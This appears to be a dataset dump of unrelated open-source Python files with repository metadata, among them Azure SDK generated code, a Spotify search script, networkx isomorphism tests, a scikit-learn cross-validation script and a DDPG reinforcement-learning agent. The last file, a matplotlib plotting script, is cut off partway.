YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507
| 2020-09-04T15:48:52
| 2020-09-04T15:48:52
| 205,457,088
| 1
| 2
|
MIT
| 2020-06-16T16:38:15
| 2019-08-30T21:08:55
|
Python
|
UTF-8
|
Python
| false
| false
| 5,600
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceLoadBalancersOperations(object):
"""NetworkInterfaceLoadBalancersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceLoadBalancerListResult"]
"""List all load balancers in a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceLoadBalancerListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.NetworkInterfaceLoadBalancerListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceLoadBalancerListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceLoadBalancerListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/loadBalancers'} # type: ignore
|
[
"noreply@github.com"
] |
YijunXieMS.noreply@github.com
|
d4ed49c5ad66c87e5989c74f78149de700205878
|
d104df89c9eeb210a10d45fb11b80bad6e53b30a
|
/150520/new_uri.py
|
39306da7bacddbbb8aacf3c6b09387a758ca5892
|
[] |
no_license
|
tbc31cc/Python-scripts
|
119c54014c1379627237463a65c2b55bf7b5d4ca
|
1e38fe3359401b5a150eed191bbcf39dbafc3e1f
|
refs/heads/master
| 2021-01-10T21:55:25.479996
| 2015-05-20T21:48:47
| 2015-05-20T21:48:47
| 35,639,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,617
|
py
|
# Sometimes Spotify stores multiple entries for an album or track, or you may accidentally add an album/track that isn't available in your country
# If you choose a bad URI with the original search, use this to load a new entry that hopefully works
# Now filters out results that are not available in specified country (US) (new method)
# Program now asks user to re-enter searchtype in the case of an invalid entry
# User can choose to open entire list of results as a text file
# Use with command line ""C:\Python27\Lib\new_uri.py" "$ascii(%artist%)" "$ascii(%album%)" "$ascii(%title%)""
import sys
import spotipy #third-party module
import pyperclip #third-party module
import string
spotify = spotipy.Spotify()
display = "URI(s) copied to clipboard. Press enter to exit"
# Specified country
country = u'US'
# args = [path, artist, album, track], taken from command line
if len(sys.argv) > 1:
artist_name = sys.argv[1]
else:
artist_name = str(raw_input('Enter artist name: '))
# Choose advanced search type (track or album)
valid_types = ['track','album']
def get_valid_type():
i = str(raw_input("Please type track or album: "))
if i in valid_types:
return i
else:
return None
while True:
searchtype = get_valid_type()
if searchtype:
break
if searchtype == 'album':
if len(sys.argv) > 2:
item = sys.argv[2]
else:
item = str(raw_input('Enter album title: '))
elif searchtype == 'track':
if len(sys.argv) > 3:
item = sys.argv[3]
else:
item = str(raw_input('Enter track title: '))
print 'Finding URI for ' + searchtype +': ' + '"'+item+'"' + ' by ' + artist_name
# Generate search results
results = spotify.search(q="artist:"+artist_name+' '+searchtype+':'+item, type = searchtype, limit = 20)
items = results[searchtype+'s']['items']
# Filter out results not available in specified country
for i, t in enumerate(items):
if country not in items[i]['available_markets']:
items[i] = []
while [] in items:
items.remove([])
# Shorten long strings
def shorten(string):
if len(string) > 80:
return string[0:80]+'...'
else:
return string
# Function for generating list of results
def print_info(i,t):
name = filter(lambda x: x in string.printable, t['name'])
album_type = ''
artist = ''
album = ''
release_date = ''
if searchtype == 'album':
get_artist = spotify.album(t['id'])
artist_name = get_artist['artists'][0]['name']
release_date = ' ('+get_artist['release_date'][0:4]+') '
artist = filter(lambda x: x in string.printable, ' '+artist_name)
if items[i]['album_type'] != 'album':
album_type = ' - '+t['album_type']
line1 = ' '+str(i)+' '+name+album_type+release_date
elif searchtype == 'track':
artist = filter(lambda x: x in string.printable, ' '+t['artists'][0]['name']+'\n')
album = filter(lambda x: x in string.printable, ' from '+'"'+t['album']['name'])
line1 = shorten(' '+str(i)+' '+name+album)+'"'
else:
line1 = ' '+str(i)+' '+name
line2 = '\n'+artist
line3 = '\n '+t['uri']+'\n'
return line1+line2+line3
# If there are multiple results, let user choose which URI to copy to clipboard.
# Searches with one result automatically copies URI.
print '\nResults:\n'
if len(items) > 0:
for i, t in enumerate(items):
print print_info(i,t)
if len(items) == 1:
n = 0
else:
n = int(input("Choose from provided list. Enter -1 to choose all items "))
# Copy final result to clipboard/Open full list as text file
if n == -1:
text = ''
for i, t in enumerate(items):
text = text + '\n' + print_info(i,t)
import subprocess as sp
programName = 'notepad.exe'
with open('output.txt', 'w') as text_file:
text_file.write(text)
sp.Popen([programName,'output.txt'])
else:
text = items[n]['uri']
pyperclip.copy(text)
else:
print 'No results found\n'
text = 'No results found'
display = 'Press enter to exit'
raw_input(display)
|
[
"tbc31cc@gmail.com"
] |
tbc31cc@gmail.com
|
60ce8d44e75ecb0dd3ee8a66f4522c00b97994c7
|
e7613f9e21d558cdb304f7268fdec433bbbbf08f
|
/Ohloh.py
|
d91bcdbab7382ccb1b354e773d337075b4dad563
|
[] |
no_license
|
mdavid/web
|
0ea1b67ce2c6006d10c79638f345b344b1aeb129
|
53fd4ca7e2c0053f27bca9384f6b3cc142a17122
|
refs/heads/master
| 2020-12-25T16:35:34.746167
| 2011-11-21T23:08:02
| 2011-11-21T23:08:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,746
|
py
|
# -*- Mode: python; coding: utf-8 -*-
#
# Cherokee Web Site
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2011 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
LANGUAGES_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_languages.js"></script>'
COCOMO_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_cocomo.js"></script>'
COCOMO_FIX_JS = """
/* Come on! $55k? Seriously? It must be a typo.. */
$('.ohloh-cocomo-box input:text').filter(function() { return $(this).val() == "55000"; }).each(function() {
$(this).val (90000);
$(this).trigger ('change');
});
"""
class Languages (CTK.Box):
def __init__ (self):
CTK.Box.__init__ (self, {'class': 'ohloh-languages-box'})
self += CTK.RawHTML (LANGUAGES_HTML)
self += CTK.RawHTML (js = COCOMO_FIX_JS)
class Cocomo (CTK.Box):
def __init__ (self):
CTK.Box.__init__ (self, {'class': 'ohloh-cocomo-box'})
self += CTK.RawHTML (COCOMO_HTML)
self += CTK.RawHTML (js = COCOMO_FIX_JS)
|
[
"alvaro@alobbs.com"
] |
alvaro@alobbs.com
|
9070f9ba6596fb792ae2d17601a5a9c0581820c3
|
fd8405ac0a5d062907c153f2f2e3569571366539
|
/irbisbooks/core/urls.py
|
17e44ae4a60722f69bb0d5da5d79b7b2b8dec070
|
[] |
no_license
|
ri-gilfanov/irbis-books
|
aab471833035ae51088bccfb0806b863aaba3468
|
0b2a32013ab7f0c0d167e0864a7cb858e8e75add
|
refs/heads/master
| 2021-01-25T13:19:07.818513
| 2018-03-02T09:47:06
| 2018-03-02T09:47:06
| 121,642,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.book_search, name='book_search'),
path('book_download/', views.book_download, name='book_download'),
]
|
[
"ri.gilfanov@yandex.ru"
] |
ri.gilfanov@yandex.ru
|
950b22a78a928e4427896cec1ba0d7c4cac4e011
|
6a4bfff7fcd78a0057401652c7f80d9a95a67267
|
/painless_redirects/tests/test_models.py
|
2f5b98013047caa595a23ef12657abfbbafe3877
|
[
"MIT"
] |
permissive
|
benzkji/django-painless-redirects
|
25987ff984830be7e45b4d0af9a9cd0046beabe7
|
153721486b214ddd5365b6ac5769129562254dd5
|
refs/heads/master
| 2023-05-24T14:23:53.783400
| 2020-06-22T10:35:29
| 2020-06-22T10:35:29
| 22,944,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
"""Tests for the models of the painless_redirects app."""
from django.test import TestCase
from . import factories
class RedirectModelTestCase(TestCase):
def test_model(self):
obj = factories.RedirectFactory()
self.assertTrue(obj.pk)
def test_redirect_value(self):
obj = factories.RedirectFactory()
self.assertEqual(obj.redirect_value('http'), "/the-new-path/")
obj.new_site = factories.SiteFactory()
self.assertEqual(obj.redirect_value('https'), "https://%s/the-new-path/" % obj.new_site.domain)
|
[
"bnzk@bnzk.ch"
] |
bnzk@bnzk.ch
|
05b6c7a41ca37a887e8c167923f6e78cb61e66c6
|
0f9772eef40e6a995514438020bfe245b0634d23
|
/UnicornsApp/app.py
|
f55610ece2f5f38113de2cbbcf76253188d21c2f
|
[] |
no_license
|
koalaboy808/Crunchbase_InfoViz
|
4edeedd1236fcd0c0e6558cceb5d4dda75ef7c1d
|
d184190a45dfeff2c92223549e0d74fb076eef19
|
refs/heads/master
| 2021-01-01T05:02:11.590233
| 2016-05-06T12:29:58
| 2016-05-06T12:29:58
| 56,036,487
| 3
| 0
| null | 2016-04-22T22:33:15
| 2016-04-12T06:17:33
|
HTML
|
UTF-8
|
Python
| false
| false
| 398
|
py
|
from flask import Flask
app = Flask(__name__, static_folder="public_html/static")
@app.route('/')
def load_root():
f = open('public_html/index.html', 'r')
raw_data = f.read()
return raw_data
@app.route('/<path:name>')
def load_file(name=None):
url = 'public_html/' + name
f = open(url, 'r')
raw_data = f.read()
return raw_data
if __name__ == "__main__":
app.run()
|
[
"gracenbrilmyer@ischool.berkeley.edu"
] |
gracenbrilmyer@ischool.berkeley.edu
|
677993bbfd1033c8a7be8606b387754616bdceda
|
853d4cec42071b76a80be38c58ffe0fbf9b9dc34
|
/venv/Lib/site-packages/networkx/algorithms/isomorphism/tests/test_tree_isomorphism.py
|
3082365a4bb61f2d8c99fcddb56c72e2af1d0aeb
|
[] |
no_license
|
msainTesting/TwitterAnalysis
|
5e1646dbf40badf887a86e125ef30a9edaa622a4
|
b1204346508ba3e3922a52380ead5a8f7079726b
|
refs/heads/main
| 2023-08-28T08:29:28.924620
| 2021-11-04T12:36:30
| 2021-11-04T12:36:30
| 424,242,582
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,443
|
py
|
import networkx as nx
import random
import time
from networkx.classes.function import is_directed
from networkx.algorithms.isomorphism.tree_isomorphism import (
rooted_tree_isomorphism,
tree_isomorphism,
)
# have this work for graph
# given two trees (either the directed or undirected)
# transform t2 according to the isomorphism
# and confirm it is identical to t1
# randomize the order of the edges when constructing
def check_isomorphism(t1, t2, isomorphism):
# get the name of t1, given the name in t2
mapping = {v2: v1 for (v1, v2) in isomorphism}
# these should be the same
d1 = is_directed(t1)
d2 = is_directed(t2)
assert d1 == d2
edges_1 = []
for (u, v) in t1.edges():
if d1:
edges_1.append((u, v))
else:
# if not directed, then need to
# put the edge in a consistent direction
if u < v:
edges_1.append((u, v))
else:
edges_1.append((v, u))
edges_2 = []
for (u, v) in t2.edges():
# translate to names for t1
u = mapping[u]
v = mapping[v]
if d2:
edges_2.append((u, v))
else:
if u < v:
edges_2.append((u, v))
else:
edges_2.append((v, u))
return sorted(edges_1) == sorted(edges_2)
def test_hardcoded():
print("hardcoded test")
# define a test problem
edges_1 = [
("a", "b"),
("a", "c"),
("a", "d"),
("b", "e"),
("b", "f"),
("e", "j"),
("e", "k"),
("c", "g"),
("c", "h"),
("g", "m"),
("d", "i"),
("f", "l"),
]
edges_2 = [
("v", "y"),
("v", "z"),
("u", "x"),
("q", "u"),
("q", "v"),
("p", "t"),
("n", "p"),
("n", "q"),
("n", "o"),
("o", "r"),
("o", "s"),
("s", "w"),
]
# there are two possible correct isomorphisms
# it currently returns isomorphism1
# but the second is also correct
isomorphism1 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "y"),
("k", "z"),
("l", "x"),
("m", "w"),
]
# could swap y and z
isomorphism2 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "z"),
("k", "y"),
("l", "x"),
("m", "w"),
]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.Graph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# try again as digraph
t1 = nx.DiGraph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.DiGraph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# randomly swap a tuple (a,b)
def random_swap(t):
(a, b) = t
if random.randint(0, 1) == 1:
return (a, b)
else:
return (b, a)
# given a tree t1, create a new tree t2
# that is isomorphic to t1, with a known isomorphism
# and test that our algorithm found the right one
def positive_single_tree(t1):
assert nx.is_tree(t1)
nodes1 = [n for n in t1.nodes()]
# get a random permutation of this
nodes2 = nodes1.copy()
random.shuffle(nodes2)
# this is one isomorphism, however they may be multiple
# so we don't necessarily get this one back
someisomorphism = [(u, v) for (u, v) in zip(nodes1, nodes2)]
# map from old to new
map1to2 = {u: v for (u, v) in someisomorphism}
# get the edges with the transformed names
edges2 = [random_swap((map1to2[u], map1to2[v])) for (u, v) in t1.edges()]
# randomly permute, to ensure we're not relying on edge order somehow
random.shuffle(edges2)
# so t2 is isomorphic to t1
t2 = nx.Graph()
t2.add_edges_from(edges2)
# lets call our code to see if t1 and t2 are isomorphic
isomorphism = tree_isomorphism(t1, t2)
# make sure we got a correct solution
# although not necessarily someisomorphism
assert len(isomorphism) > 0
assert check_isomorphism(t1, t2, isomorphism)
# run positive_single_tree over all the
# non-isomorphic trees for k from 4 to maxk
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 13 takes about 2.86 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_positive(maxk=14):
print("positive test")
for k in range(2, maxk + 1):
start_time = time.time()
trial = 0
for t in nx.nonisomorphic_trees(k):
positive_single_tree(t)
trial += 1
print(k, trial, time.time() - start_time)
# test the trivial case of a single node in each tree
# note that nonisomorphic_trees doesn't work for k = 1
def test_trivial():
print("trivial test")
# back to an undirected graph
t1 = nx.Graph()
t1.add_node("a")
root1 = "a"
t2 = nx.Graph()
t2.add_node("n")
root2 = "n"
isomorphism = rooted_tree_isomorphism(t1, root1, t2, root2)
assert isomorphism == [("a", "n")]
assert check_isomorphism(t1, t2, isomorphism)
# test another trivial case where the two graphs have
# different numbers of nodes
def test_trivial_2():
print("trivial test 2")
edges_1 = [("a", "b"), ("a", "c")]
edges_2 = [("v", "y")]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
t2 = nx.Graph()
t2.add_edges_from(edges_2)
isomorphism = tree_isomorphism(t1, t2)
# they cannot be isomorphic,
# since they have different numbers of nodes
assert isomorphism == []
# the function nonisomorphic_trees generates all the non-isomorphic
# trees of a given size. Take each pair of these and verify that
# they are not isomorphic
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 11 takes about 4.76 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_negative(maxk=11):
print("negative test")
for k in range(4, maxk + 1):
test_trees = list(nx.nonisomorphic_trees(k))
start_time = time.time()
trial = 0
for i in range(len(test_trees) - 1):
for j in range(i + 1, len(test_trees)):
trial += 1
assert tree_isomorphism(test_trees[i], test_trees[j]) == []
print(k, trial, time.time() - start_time)
|
[
"msaineti@icloud.com"
] |
msaineti@icloud.com
|
d9fd3e3f6f7c3d6c386072c39ae5b4202edd2d08
|
2f3c4ea9f0a9ab60a38fa8afc9087b327da643be
|
/Cross-Validation/validacao_cruzada_cross_val_score.py
|
5c5d20ef1eee0fe967bf20593a4b9ef4a4db4711
|
[] |
no_license
|
guilhermelamb/Machine-Learning-Studies
|
e919c74f4b881c049b87b46191e65f3f77235d13
|
1abff5a0a063636468b00c68015f1a8c8b058757
|
refs/heads/main
| 2023-08-19T07:55:01.538452
| 2021-10-12T15:13:05
| 2021-10-12T15:13:05
| 333,989,001
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 787
|
py
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB
base = pd.read_csv('credit_data.csv')
base.loc[base.age < 0, 'age'] = 40.92
previsores = base.iloc[:, 1:4].values
classe = base.iloc[:,4].values
imputer = SimpleImputer(missing_values = np.nan, strategy='mean')
imputer = imputer.fit(previsores[:,1:4])
previsores[:,1:4] = imputer.transform(previsores[:,1:4])
scaler = StandardScaler()
previsores = scaler.fit_transform(previsores)
classificador = GaussianNB()
resultados = cross_val_score(classificador, previsores, classe, cv = 10)
resultado_final = resultados.mean()
resultado_std = resultados.std()
|
[
"guilhermelamb@gmail.com"
] |
guilhermelamb@gmail.com
|
19414b707e9497314917d44fc6119c2108d592fe
|
833f76620c02f4a02a19b3a2e13b0de6b947a28a
|
/agent.py
|
cb3a86f7f5228415e5fae3aa84580b222a4b80d4
|
[] |
no_license
|
dszokolics/deepRL-continuous-control
|
0bf9af540b1cd4211da5f018a8f57fb7b6dcf0aa
|
6dfcb247fa792bcd794bf481a1cea1cb84f3a073
|
refs/heads/master
| 2023-04-27T17:18:34.014978
| 2021-05-16T10:24:16
| 2021-05-16T10:24:16
| 367,846,375
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,626
|
py
|
import numpy as np
import random
import copy
from collections import namedtuple, deque
import torch
import torch.nn.functional as F
import torch.optim as optim
from model import Actor, Critic
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self, state_size, action_size, random_seed, num_agents, agent_params):
"""Initialize an Agent object.
Based on https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
Params
======
state_size (int): dimension of each state
action_size (int): dimension of each action
random_seed (int): random seed
"""
self.state_size = state_size
self.action_size = action_size
self.seed = random.seed(random_seed)
self.params = agent_params
# Actor Network (w/ Target Network)
self.actor_local = Actor(state_size, action_size, random_seed).to(device)
self.actor_target = Actor(state_size, action_size, random_seed).to(device)
self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=self.params["lr_actor"])
# Critic Network (w/ Target Network)
self.critic_local = Critic(state_size, action_size, random_seed).to(device)
self.critic_target = Critic(state_size, action_size, random_seed).to(device)
self.critic_optimizer = optim.Adam(
self.critic_local.parameters(), lr=self.params["lr_critic"], weight_decay=self.params["weight_decay"]
)
# Noise process
self.noise = OUNoise(action_size, random_seed, num_agents)
# Replay memory
self.memory = ReplayBuffer(action_size, self.params["buffer_size"], self.params["batch_size"], random_seed)
self.steps_since_last_update = 0
def step(self, state, action, reward, next_state, done):
"""Save experience in replay memory, and use random sample from buffer to learn."""
# Save experience / reward
self.memory.add(state, action, reward, next_state, done)
self.steps_since_last_update += 1
# Learn, if enough samples are available in memory
if len(self.memory) > self.params["batch_size"]:
if self.steps_since_last_update % self.params["update_every"]:
for _ in range(self.params["update_batch_number"]):
experiences = self.memory.sample()
self.learn(experiences, self.params["gamma"])
def act(self, state, add_noise=True):
"""Returns actions for given state as per current policy."""
state = torch.from_numpy(state).float().to(device)
self.actor_local.eval()
with torch.no_grad():
action = self.actor_local(state).cpu().data.numpy()
self.actor_local.train()
if add_noise:
action += self.noise.sample()
return np.clip(action, -1, 1)
def reset(self):
self.noise.reset()
def learn(self, experiences, gamma):
"""Update policy and value parameters using given batch of experience tuples.
Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
where:
actor_target(state) -> action
critic_target(state, action) -> Q-value
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# ---------------------------- update critic ---------------------------- #
# Get predicted next-state actions and Q values from target models
actions_next = self.actor_target(next_states)
Q_targets_next = self.critic_target(next_states, actions_next)
# Compute Q targets for current states (y_i)
Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Compute critic loss
Q_expected = self.critic_local(states, actions)
critic_loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.critic_optimizer.zero_grad()
critic_loss.backward()
torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
self.critic_optimizer.step()
# ---------------------------- update actor ---------------------------- #
# Compute actor loss
actions_pred = self.actor_local(states)
actor_loss = -self.critic_local(states, actions_pred).mean()
# Minimize the loss
self.actor_optimizer.zero_grad()
actor_loss.backward()
torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
self.actor_optimizer.step()
# ----------------------- update target networks ----------------------- #
self.soft_update(self.critic_local, self.critic_target, self.params["tau"])
self.soft_update(self.actor_local, self.actor_target, self.params["tau"])
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Params
======
local_model: PyTorch model (weights will be copied from)
target_model: PyTorch model (weights will be copied to)
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)
class OUNoise:
"""Ornstein-Uhlenbeck process.
https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
"""
def __init__(self, action_size, seed, num_agents, mu=0., theta=0.2, sigma=0.25):
"""Initialize parameters and noise process."""
self.mu = mu * np.ones((num_agents, action_size))
self.theta = theta
self.sigma = sigma
self.seed = random.seed(seed)
self.reset()
def reset(self):
"""Reset the internal state (=noise) to mean (mu)."""
self.state = copy.copy(self.mu)
def sample(self):
"""Update internal state and return it as a noise sample"""
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * (np.random.standard_normal(size=x.shape))
self.state = x + dx
return self.state
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, buffer_size, batch_size, seed):
"""Initialize a ReplayBuffer object.
https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
Params
======
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
"""
self.action_size = action_size
self.memory = deque(maxlen=buffer_size) # internal memory (deque)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
for s, a, r, s_next, d in zip(state, action, reward, next_state, done):
e = self.experience(s, a, r, s_next, d)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)
actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).float().to(device)
rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
next_states = (
torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device)
)
dones = (
torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8))
.float().to(device)
)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory)
|
[
"daniel.szokolics@gmail.com"
] |
daniel.szokolics@gmail.com
|
f37f65c77fc2cbe630313fe9779572d9243628eb
|
96aa2367affe0dff353e1aaac8713ded087c5f68
|
/utils/spiderPlot_SA.py
|
335ed09082b623795670281ed3731ae77c81e7d3
|
[
"Apache-2.0"
] |
permissive
|
NMTHydro/Recharge
|
0fcca9a72b631d6c3834c62b84dfb096da6cb210
|
bbc1a05add92064acffeffb19f04e370b99a7918
|
refs/heads/develop
| 2020-05-21T17:39:37.702622
| 2020-04-08T17:10:40
| 2020-04-08T17:10:40
| 60,631,952
| 8
| 1
| null | 2016-10-26T17:01:21
| 2016-06-07T17:13:30
|
Python
|
UTF-8
|
Python
| false
| false
| 5,333
|
py
|
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from numpy import linspace, array, add, multiply, set_printoptions
from pandas import read_pickle, set_option, options
def round_to_value(number, roundto):
return round(number / roundto) * roundto
rc('mathtext', default='regular')
set_option('display.max_rows', None)
set_option('display.max_columns', None)
set_option('display.width', None)
set_option('display.precision', 3)
options.display.float_format = '${:,.2f}'.format
set_printoptions(threshold=3000, edgeitems=5000, precision=3)
set_option('display.height', None)
set_option('display.max_rows', None)
TEMPS = range(-5, 6)
ALL_PCT = [x * 0.1 for x in range(5, 16)]
ndvi_range = linspace(0.9, 1.7, 11)
NDVI_RANGE = array([round_to_value(x, 0.05) for x in ndvi_range])
def make_spider_plot(dataframe, ndvi, all_pct, temps, fig_path=None, show=False):
display_pct = [(int(x)) for x in add(multiply(all_pct, 100.0), -100)]
dfs = os.listdir(dataframe)
print 'pickled dfs: {}'.format(dfs)
filename = '_basic_sensitivity_2.pkl'
if filename in dfs:
df = read_pickle(os.path.join(dataframe, filename))
df.to_csv(os.path.join(fig_path, 'sample_df_basic_2.csv'))
pass
print df
xx = 1
for index, row in df.iterrows():
fig = plt.figure(xx, figsize=(20, 10))
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax3 = ax1.twiny()
fig.subplots_adjust(bottom=0.2)
print 'shape temps: {}, shape row[0]: {}'.format(len(temps), len(row[0]))
